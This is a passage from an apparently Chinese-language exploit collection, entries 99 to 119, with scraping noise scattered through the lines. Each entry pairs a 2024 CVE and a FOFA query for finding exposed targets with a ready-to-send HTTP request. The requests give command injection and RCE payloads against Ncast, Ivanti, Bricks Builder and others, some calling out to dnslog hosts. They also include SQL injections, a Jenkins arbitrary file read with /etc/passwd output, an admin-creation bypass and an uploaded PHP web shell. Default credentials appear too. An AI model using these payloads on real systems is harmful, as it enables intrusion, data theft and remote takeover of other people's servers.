User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
) E3 l8 n, b1 wConnection: close0 t& ?! Q6 r. F
Content-Length: 121
9 P6 @1 e: P) G }! ?Accept: */*
H4 `" _1 w2 {4 `5 R6 }Accept-Encoding: gzip, deflate3 p6 \) u3 X4 U: Q1 h( V. D
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
& [, c7 y: n' T& S7 w. nContent-Type: application/x-www-form-urlencoded; charset=UTF-8
u4 [/ g* U6 E8 s# RX-Requested-With: XMLHttpRequest
5 U7 X) H% w9 @0 v4 N
: q6 w' G* }+ w( ?$ ]; [1 R3 mid=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B
; S: e3 h( Q4 R9 _* h1 g; C8 s6 h( h2 i B6 Z! s
- C" }0 C1 T. C& H a8 C7 }99. Ncast盈可视高清智能录播系统busiFacade RCE' p, |: m6 I" c: w: d( T
CVE-2024-0305
' }, W, Q0 S/ W% XFOFA:app="Ncast-产品" && title=="高清智能录播系统", u* k/ N% W, _. B8 D3 `. h- W
POST /classes/common/busiFacade.php HTTP/1.1! @8 \; \3 \6 q" {3 B& v
Host: 192.168.40.130:8080
$ F4 l3 w% C. a' t L' gUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 X( ~# M h5 u3 P
Connection: close
! x, O8 U! U7 E. ~Content-Length: 154
. H. [- u4 i( j/ U0 xAccept: */*
# g& B4 B" E( c9 N8 o1 EAccept-Encoding: gzip, deflate- S' p. s* {2 n3 F9 U$ J( u
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
8 S8 Z( [ u- p6 zContent-Type: application/x-www-form-urlencoded; charset=UTF-8
; C' n2 V. m" {1 H0 ?! U! hX-Requested-With: XMLHttpRequest* U5 J2 J+ K& r5 f7 c& c: y+ I
' ~, |/ ?: W% {/ E8 x) x3 }
%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D3 i* s& w4 N7 B7 ]2 K) y) M
% A( K7 s2 T* p( n x3 D/ c
: b1 ]+ R( x; e% J/ l' K W0 a9 n1 j100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传* T; n+ N7 O3 B- J5 {
CVE-2024-0352: k& {. X/ V# W7 H' r9 I
FOFA:icon_hash="874152924"
. ~5 d$ v# G; aPOST /api/file/formimage HTTP/1.12 y. C- P$ D3 ^/ ]
Host: 192.168.40.130
0 t. M4 E5 ^0 RUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.369 r- V; Q) H# d# M
Connection: close
$ L; R5 X+ ~% F) N wContent-Length: 201# w& @5 `8 u; [1 o4 E! e- V* y
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei7 P0 f6 }' Y: ?3 t4 {) Q% z
Accept-Encoding: gzip$ k+ s' d- e" g& q' k2 Z
- o9 G& T. P" K$ K
------WebKitFormBoundarygcflwtei
( v, P3 {. \' }. WContent-Disposition: form-data; name="file";filename="IE4MGP.php"
& N* O$ B( {3 }Content-Type: application/x-php
5 T; i3 ^! Y+ A$ ]6 w. q
3 G" f+ l# b; t" \6 k! W" U1 i2ayyhRXiAsKXL8olvF5s4qqyI2O+ r+ y2 `4 n3 h. i2 n! D4 N( r* J1 B
------WebKitFormBoundarygcflwtei--
9 d. T# x3 J% b8 I& X
" v7 t" i( u2 T9 ~: [$ `" s1 T
& P5 K" X. f1 O101. ivanti policy secure-22.6命令注入
" c$ X+ c+ R2 TCVE-2024-21887
/ c+ }7 E6 ~9 H/ IFOFA:body="welcome.cgi?p=logo"
1 L4 {7 Z4 L6 d" ~3 {' F0 fGET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
7 W7 q3 p1 D) m. SHost: x.x.x.xx.x.x.x
. V$ n$ h2 |* d N% v5 {User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
^' Y Z/ t" j/ Y% c' YConnection: close
$ x+ D# o. `$ L5 C" w% {Accept-Encoding: gzip
1 }7 e3 v$ n- l! [9 W9 f0 Z5 H# Q* i# Z" R2 l) h; K
' m3 S7 N+ K$ t
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
( { c+ ?8 k7 F E6 L( J5 ~CVE-2024-21893) ?' W: K$ V* X' N- L
FOFA:body="welcome.cgi?p=logo"
- d2 Y8 L7 H0 }9 W( q7 R; `4 qPOST /dana-ws/saml20.ws HTTP/1.1) r7 ^( f2 _1 V- y( h" S
Host: x.x.x.x
/ T5 V5 H/ q# l0 VUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36- C. X8 y; K% s8 y. H |! [
Connection: close0 O e, i }- E8 D' q9 \: y$ K
Content-Length: 792
; V N# I4 \. tAccept-Encoding: gzip
/ K3 q. d. l( ?# L: c4 s( j
0 I! n# w5 [+ b. x<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>* z+ p g$ N# [. t( z, w
, W, [) i/ V- H" w103. Ivanti Pulse Connect Secure VPN XXE
2 Y6 |- y9 |- h$ z! y: ^CVE-2024-22024
- S, \% b1 p# Y: e" ?3 O$ oFOFA:body="welcome.cgi?p=logo"$ v) u' S$ m4 `! C
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
0 e9 N6 C, `# {: l# b7 F% tHost: 192.168.40.130:111
. }+ l% t: R1 ~5 \2 \% NUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36/ u6 K6 D; U1 l1 J& h5 ]
Connection: close
$ j) u6 `: b WContent-Length: 2048 V- h! R6 m+ j8 [) m
Content-Type: application/x-www-form-urlencoded
) F! g7 ] K3 JAccept-Encoding: gzip
! w* H }/ @8 c) ]$ }. @. h7 X# e$ ^& ?
SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==6 c1 U. H1 U5 B* h9 R7 V
' r0 w4 Y, V; [5 |" l! G
6 ?0 ^, X7 O9 u) {- [其中SAMLRequest的值是xml文件内容的base64值,xml文件如下/ P; g2 m$ R0 [3 ^
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>( Y5 ^( J5 }( c L0 b& p' |
! h8 }: c r9 i& L
' E6 y1 ]. p" B0 O! d J104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露5 s8 J0 {* q/ K: B6 c/ s3 t. x6 y
CVE-2024-0569
; y% u& H" {. ^5 _3 D, dFOFA:title="TOTOLINK"$ S% L" d# _: b% C3 m. l$ d7 |
POST /cgi-bin/cstecgi.cgi HTTP/1.1
% Q% v9 d3 ^3 XHost:192.168.0.1( \- f3 S8 Q1 u7 J* i8 a# t2 s
Content-Length:41/ x6 h' {: S& L
Accept:application/json,text/javascript,*/*;q=0.01
& h- S& c. ~0 e) \ L. V" @X-Requested-with: XMLHttpRequest& A A! C. Z- I
User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.362 R( f& v# e$ G! v/ m
Content-Type: application/x-www-form-urlencoded:charset=UTF-8
* q2 H9 [& |3 s+ j" K: A x& S( QOrigin: http://192.168.0.1, \5 g+ r5 X( Z, I7 j. T) S" l
Referer: http://192.168.0.1/advance/index.html?time=16711523805649 N/ r% N7 P% ^3 Q! S
Accept-Encoding:gzip,deflate
) P% h3 g4 j, K# r1 xAccept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.78 b- D! [% Y0 ~& p8 E0 \
Connection:close
4 r7 ]9 X: f \/ `2 j7 R
* x, K. T, P$ @) m{
- ]0 |( s7 L3 }4 }"topicurl":"getSysStatusCfg",
. I; ]8 L# H- d) q/ r9 A"token":""
4 Z% D. S) Q& c}
5 H4 y7 T: y2 H3 q+ z% ~/ q% Q% J+ o6 Y3 e, l% B& U' C) \
105. SpringBlade v3.2.0 export-user SQL 注入
2 a3 {0 I0 B: ^! b- JFOFA:body="https://bladex.vip"
$ A' R: o5 T4 l# H' G zhttp://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1
( t+ H$ L0 L, o+ R& e r0 C+ ?- T6 A2 p' U( ]
106. SpringBlade dict-biz/list SQL 注入
; P, ^: ~- Y& f. l9 m0 k# A0 yFOFA:body="Saber 将不能正常工作"8 q/ o1 J: U7 }4 l* q8 {* r
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.14 P1 h/ h4 M4 E/ d5 N3 Q) i3 C7 n$ f
Host: your-ip* j, R0 F9 x1 }, u9 q( J; g \
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.362 a3 d9 C) [' e, Q! i" }
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
. E3 E# A/ O2 K- R& \5 j, eAccept-Encoding: gzip, deflate5 J& b) F" r, H# ?2 J0 p# e0 X
Accept-Language: zh-CN,zh;q=0.9: b" d; W* K1 d* g+ V$ G
Connection: close
) B9 a/ A5 i6 |3 d3 F" T
0 g: J, w& f! y# K) h% H, m q0 A5 n2 v7 P5 Y3 J l1 W1 S, T
107. SpringBlade tenant/list SQL 注入
9 X4 y9 c3 n: ], b. uFOFA:body="https://bladex.vip") n h8 h/ a( t# L
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1- ~+ S5 R: l6 u4 u# k, N- m
Host: your-ip- c2 M6 p! A7 Z' D' J( I) W
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
! g. X# }+ [7 p9 i6 V2 h- ABlade-Auth:替换为自己的2 [( e/ T8 A+ P4 W' r2 l
Connection: close
/ _1 `9 Z! |5 K
/ b! F1 a" s& q' ?* A. I" h4 n3 a* E/ f2 A! Q/ u4 d+ S4 _
108. D-Tale 3.9.0 SSRF, b: i: E) j) z
CVE-2024-21642
5 Q' O: T! \: Q+ i q% w9 {. SFOFA:"dtale/static/images/favicon.png"( ]- D1 A2 N" T! h; h
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.18 w4 x7 p- c* p$ c
Host: your-ip* D' l9 [% ~- w' j' \4 ]
Accept: application/json, text/plain, */*, t8 ]. y4 W7 p$ u
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
: i3 L L4 @+ X' N$ N' a) ~Accept-Encoding: gzip, deflate
' z! i+ r: m5 j& S0 E% l6 a: z3 i4 nAccept-Language: zh-CN,zh;q=0.9,en;q=0.8" q1 ]) e* A$ S, ]) W, H# \
Connection: close( O( R1 y; J7 K8 g
) P* s- f5 q" |: C
0 H2 X, L j, ~2 i; k109. Jenkins CLI 任意文件读取
% u* S% o4 W( E q* M. L/ E; RCVE-2024-23897
. \4 w7 T, j' l2 W: IFOFA:header="X-Jenkins"; F: e) L/ q5 y& y- i, m4 d
POST /cli?remoting=false HTTP/1.1$ i5 c; L& C) _1 ?
Host:
s0 I4 w# p7 h7 f, j' R1 {Content-type: application/octet-stream* Z' ?& t2 o7 v( c j4 u
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92: \$ I! O* u1 e( F5 _. d
Side: upload6 k' x3 f+ A5 p% ~
Connection: keep-alive$ A8 _; p- Q1 Q; ~8 |3 a" d) l3 v: M
Content-Length: 163. O9 s% @4 t2 u
& W3 c$ g) _: K( a/ Y) g
b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'3 _+ |" f7 o3 p$ E& v& F" s
: B0 C% l0 K- V/ m! F
* c" j" H" g6 A/ a; `% nPOST /cli?remoting=false HTTP/1.1
_" O; \4 N2 h9 @: KHost:
* b2 d" @$ Y5 \/ k. hSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
/ ?, _, l9 V% [: I" S$ A; Ndownload
; x D) _0 `" _9 HContent-Type: application/x-www-form-urlencoded% l% k" e d8 E, f, q
Content-Length: 0
5 @6 C# h& d. ~5 ]# H- T1 I) C% B+ Y
: w7 U" x; i) _, B8 h& D& |ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
# S! K$ F7 ^0 }$ q4 {+ B* ujava -jar jenkins-cli.jar help% f% L( ?1 F2 w' Q/ x
[COMMAND]
7 Q% a& }" w- A+ _+ W: z- QLists all the available commands or a detailed description of single command.& n( }/ Z4 b F
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)
: c" S; |) t: A! s$ z+ [
; ]' s" {1 b7 u3 c
" k: h3 e+ q2 w* E9 S1 t110. Goanywhere MFT 未授权创建管理员
" @" y* \" ?+ k( [- h) ?CVE-2024-0204
2 t: ?( O _1 H I! r2 ]* YFOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
7 c( K! y5 y% U$ U3 P9 d& PGET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
4 L* h2 B o, Z: ~Host: 192.168.40.130:8000( X, C2 z Q9 c
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.369 x3 b$ T: s) d" c* ? B+ @- Z
Connection: close
. X4 l2 Y+ @2 T" u7 U" vAccept: */*
9 ]. I& I) z, L* d8 QAccept-Language: en
' y' s+ i. d5 j" [& }+ E0 tAccept-Encoding: gzip! P8 N4 a8 D/ t6 ]6 p K* q) P
' ~/ Z/ ^2 m' y8 {. C' p) r# [& p% F) P8 e( R2 D( x, y
111. WordPress Plugin HTML5 Video Player SQL注入' X B" B- V o2 ~- K1 F; u: z
CVE-2024-1061
8 C, ~* ^# E3 V0 M( ~ L. @5 zFOFA:"wordpress" && body="html5-video-player"5 k5 j2 ]8 u1 N- L+ B1 @
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
2 T4 ~ q; J M" U& uHost: 192.168.40.130:1129 n& w- ?9 T* M$ A \5 _
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
: u; A. C1 h% ]- k' V3 xConnection: close
1 f& T. X( n6 NAccept: */*
) X5 g+ g5 M) P! c% vAccept-Language: en
* r2 Y3 I3 p- {Accept-Encoding: gzip0 o U( J7 E) S, f2 ?4 z2 f; f
1 K0 F5 {& k; n+ x3 B
" l; e1 v, K2 _& H112. WordPress Plugin NotificationX SQL 注入
- k7 I/ M0 D2 c# P' B' pCVE-2024-1698
@8 K* J0 p6 C* J$ bFOFA:body="/wp-content/plugins/notificationx"
/ J( w; C2 u1 X4 r* f, P; ^POST /wp-json/notificationx/v1/analytics HTTP/1.1
5 K1 a! K( t: uHost: {{Hostname}}1 d* h) H3 M) f" r
Content-Type: application/json
' d! I5 g5 F) x8 }7 l+ I4 P# W
6 ?! v3 O3 ^5 [5 E: `; @1 T{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}
! [! ]" v R% A3 ^# E& F3 j/ ~6 g4 c( L
) U7 c& P7 V ?113. WordPress Automatic 插件任意文件下载和SSRF- u. a6 T$ U- b. H6 w% t/ B: {
CVE-2024-27954
* S1 p$ A7 q( [( Y3 gFOFA:"/wp-content/plugins/wp-automatic"
+ Q- O. Y& L1 F9 g Z% c2 pGET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1. u& U# ~" J9 w8 m! y5 X1 ?5 t2 ?
Host: x.x.x.x
6 q' }* D. J( G- b. R9 j( r. kUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
: q8 E7 B+ p2 T3 W7 B4 }Connection: close8 q6 h1 a6 z; [
Accept: */*
+ m+ H1 Q* I3 t" M" `5 @Accept-Language: en: f8 @ I. f- u0 u r/ q9 \
Accept-Encoding: gzip
- p; }; U! a6 ?6 |, L' T1 C, k, p# u% h# g" C# Y
n2 W: B0 Z6 w1 J8 {2 x4 Y; ]; Y
114. WordPress MasterStudy LMS插件 SQL注入: O8 F# I: \; z2 X' Y
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
8 U8 t4 ?3 X, l0 eGET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
( A* }8 s. [9 yHost: your-ip
2 \& Y" S0 `( q" \5 uUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
2 u! ^, j( J. Q! @: h2 R- o3 |% OAccept-Charset: utf-8
. C# ]0 c( }1 H% ?Accept-Encoding: gzip, deflate! R8 P/ P k$ K& Y; m
Connection: close
0 a8 C. { }2 ~- E1 ?" W1 |4 p
T! n' z/ `/ S9 V5 t4 a
* L6 _: [. F6 i* C7 e3 g115. WordPress Bricks Builder <= 1.9.6 RCE
! O: E0 X) x# VCVE-2024-25600
) L) U) w( J+ O( O( z; YFOFA: body="/wp-content/themes/bricks/"
7 r! {% \& U3 n# G第一步,获取网站的nonce值. R, d$ y; N1 o& F9 c, u- A
GET / HTTP/1.1
* H/ m( g9 p/ c: [Host: x.x.x.x
- u0 S5 ?4 E. }$ r2 FUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36+ G9 Y$ {/ w% ]3 [1 m2 }- B% ^ A. s) C
Connection: close( V6 V7 D* D; T4 q x' ^
Accept-Encoding: gzip
: {' v4 D2 E& q; g, Z
7 s: g) @0 q* b# `
7 Y3 M d/ s" n N' I. w: y: c9 E第二步替换nonce值,执行命令
2 O0 G) h9 Q/ v1 B T4 KPOST /wp-json/bricks/v1/render_element HTTP/1.1' [& `: t* E0 _# o% F2 z' K1 U
Host: x.x.x.x
0 g( \9 ?) y+ g0 ]. ?( {User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36+ j! Q3 B- c6 g" E
Connection: close% m9 B7 y+ i5 |$ Z: q
Content-Length: 356# f! a5 ^7 D i V$ l( S
Content-Type: application/json7 v* b. M4 S% B' d, Z1 a) R
Accept-Encoding: gzip
, V; x+ L( x2 Q6 {) ]. n T9 X3 d+ C. w9 ~0 x
{
6 }+ v4 _$ C4 d& G"postId": "1",
9 z: z7 d( h7 ^, y2 g% v) m "nonce": "第一步获得的值",
6 C! B; I, Y! K+ e "element": {
% S: i$ r9 n( ]8 S "name": "container",; d' ?8 C K' L7 F3 Z. n' [" T8 Y
"settings": {
f. [/ q4 k& Q5 e( ? "hasLoop": "true",# ]" o1 z' ^, I X# \, K% H( \
"query": {
4 B( }2 p) B2 f "useQueryEditor": true,; D6 u D5 ?$ L7 h/ N7 R. @& T. b2 k
"queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
; x. z7 u6 i( b% ]3 N* v "objectType": "post"
' C. o8 o$ t2 z% ~# ?2 s/ c }- _6 l5 h# r; V1 {/ ]0 n. F
}, e! V& y" C( Q) _: k' j+ F
}
0 R$ f) q6 J- [1 H, a) r; ^}
: a0 B, d7 I0 w$ }3 E1 g6 Z
$ Q7 q* b% h! z% Y6 q! B
9 f' {6 {# ]9 d4 r4 ]116. wordpress js-support-ticket文件上传2 r- \' V3 }& v6 n& P/ N# P$ M) j4 D, j
FOFA:body="wp-content/plugins/js-support-ticket"
, n! u2 N; m0 q+ P, B4 qPOST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
2 y8 K J/ t7 q4 | ~Host:
/ }: b9 j0 D: a# n) V$ yContent-Type: multipart/form-data; boundary=--------767099171
5 O7 f/ ]+ L4 l* R% G( @User-Agent: Mozilla/5.0) W7 @* b# {) G. w! B- I
) B. f1 q$ l( A6 |+ B2 {' }----------7670991713 a5 o1 P& Z8 I, C% ` q- I) c
Content-Disposition: form-data; name="action"
5 ^) X! v: d% tconfiguration_saveconfiguration5 z* M0 @2 V% p7 c" c# N: a) z/ e* H
----------767099171
0 w ]1 t% i& s! ]4 p/ BContent-Disposition: form-data; name="form_request"/ p- _ w! x* e7 y" M+ H
jssupportticket
9 a7 T* ]3 O3 C/ Y/ `----------7670991717 C a* u% `: r- F" b
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
4 m# I/ P" I+ G _* e3 @, E0 \5 WContent-Type: image/png" b5 J f/ \; V8 t% ]- @
----------767099171--
- A: P& _: g: ]' C1 [' y% I) d+ a
, k: K2 V5 E( {! w) Z( t5 H
1 K* Q3 s; z* E7 f117. WordPress LayerSlider插件SQL注入
2 i2 Z" G% x# wversion:7.9.11 – 7.10.0, ]2 t" F0 u+ I9 }( f" h
FOFA:body="/wp-content/plugins/LayerSlider/"
. g2 ~4 L3 I; H+ g! _; Z: T- eGET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1% Y @' D/ b' w9 b5 v
Host: your-ip9 L9 M7 Y. }3 j2 R% k0 }
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.00 R* c- ~" q+ Z' H! I* X
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
: D5 d1 Y9 @4 G; JAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
4 w. j" D, h/ r' Z/ d9 PAccept-Encoding: gzip, deflate, br
0 y2 X) J! j' H# d. \% j: h5 yConnection: close
+ d% }9 H! v7 W% _% \Upgrade-Insecure-Requests: 18 L$ N4 I* X) U" L# a
% J6 o/ O+ l5 l, e' [
6 N; ?; R. i: h1 m; C( q9 E I7 Y118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
! ] d8 d% b# N3 l2 y. dCVE-2024-0939
q: h1 P6 g$ L/ ^- _! _FOFA:title="Smart管理平台"
" {0 ]6 G8 l; P* K2 F" b' JPOST /Tool/uploadfile.php? HTTP/1.1
+ p1 o" y1 n8 A3 |( vHost: 192.168.40.130:8443
2 R8 }# ` n% k M9 [2 E3 xCookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f88 R- ^9 s3 L/ C3 Z+ F, z: {
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0" D- r! @$ j6 C6 k$ @0 ?
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8. Q3 C& r7 ]9 t0 Y; l
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.25 z6 m1 J' f' e+ _
Accept-Encoding: gzip, deflate
; h9 j; {# M" A. g t/ j7 nContent-Type: multipart/form-data; boundary=---------------------------139797012227476466340371828875 U* Z( Q- G) s" {, B
Content-Length: 405* o0 A7 j( G( ]$ n# Q
Origin: https://192.168.40.130:84439 i; H( {- |, F {' _7 e* ]1 J1 \
Referer: https://192.168.40.130:8443/Tool/uploadfile.php2 h/ r* n V* C: O6 R3 `7 j, O: o4 S
Upgrade-Insecure-Requests: 1
: T! }& ^+ b# M5 {2 gSec-Fetch-Dest: document0 ~& ?" i$ \* t. ^9 `; u1 M1 T$ y1 D0 o: t6 r
Sec-Fetch-Mode: navigate; \2 O' M) C3 n- v: ?
Sec-Fetch-Site: same-origin( t7 b& ]9 ~* a, | h9 a
Sec-Fetch-User: ?1
; p( R5 c; |( R, Q; @$ p4 JTe: trailers a& p p1 H! {2 N' Z
Connection: close
0 A" R# s1 O1 B% i4 d
" P: y2 a) D: X2 H-----------------------------139797012227476466340371828877 _6 h! u4 r% _& r. I0 K
Content-Disposition: form-data; name="file_upload"; filename="contents.php"! C4 m3 g* Z3 v5 ]
Content-Type: application/octet-stream
4 J% m) E7 J- R; s, P, |
3 [6 G9 J; W E) w<?php1 c) j B" }4 Q: H$ U
system($_POST["passwd"]);& j& k+ O$ b: w: q, Y
?>
|, G, r# b' q$ A+ ]0 W( \8 [6 r-----------------------------13979701222747646634037182887
$ h) U3 B! \+ {1 k' hContent-Disposition: form-data; name="txt_path"
0 A" s7 e7 h$ S) P. D; ~) F! Y9 e; \4 k) o5 X: j% o
/home/src.php. \4 d! B& ]5 N. i. z# E
-----------------------------13979701222747646634037182887--
" P T+ o/ o- @5 H2 z' V. _
# v1 r# m) U2 k9 T
4 T- _0 S X1 T" L5 H; R( f" [访问/home/src.php4 z9 E" y2 q( |3 n
5 |' ?: i' {4 h119. 北京百绰智能S20后台sysmanageajax.php sql注入: t4 s( p' @3 K
CVE-2024-1254
9 x: m, l2 T# h3 l' D3 L8 D$ K% gFOFA:title="Smart管理平台"
! |7 l$ g# {2 I+ u( S( |( o, @先登录进入系统,默认账号密码为admin/admin0 e: {" @, Y* T8 {
POST /sysmanage/sysmanageajax.php HTTP/1.113 V3 q' H, Z0 `+ C6 V5 U6 [
Host: x.x.x.x" q& `9 F( M, |" Q# S
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee H8 ~0 F7 v' F* C3 r
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
+ p$ X% L2 m( t8 n& }0 P5 K3 `Accept: */*' l4 ]9 ^# a' ~! H
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2/ O) M& j, h& n- m- B+ C) D
Accept-Encoding: gzip, deflate/ k- r8 E1 x5 ?& j8 n' M2 D) p
Content-Type: application/x-www-form-urlencoded;. i. b% ]9 G% w2 [7 ~
Content-Length: 109
- A, c p f! |9 COrigin: https://58.18.133.60:8443
9 ?+ r. v5 J: a; iReferer: https://58.18.133.60:8443/sysmanage/manageadmin.php
2 o# n2 K2 N9 z8 w# QSec-Fetch-Dest: empty1 J* G! Z& ^6 B! R6 w! S( L6 Q
Sec-Fetch-Mode: cors
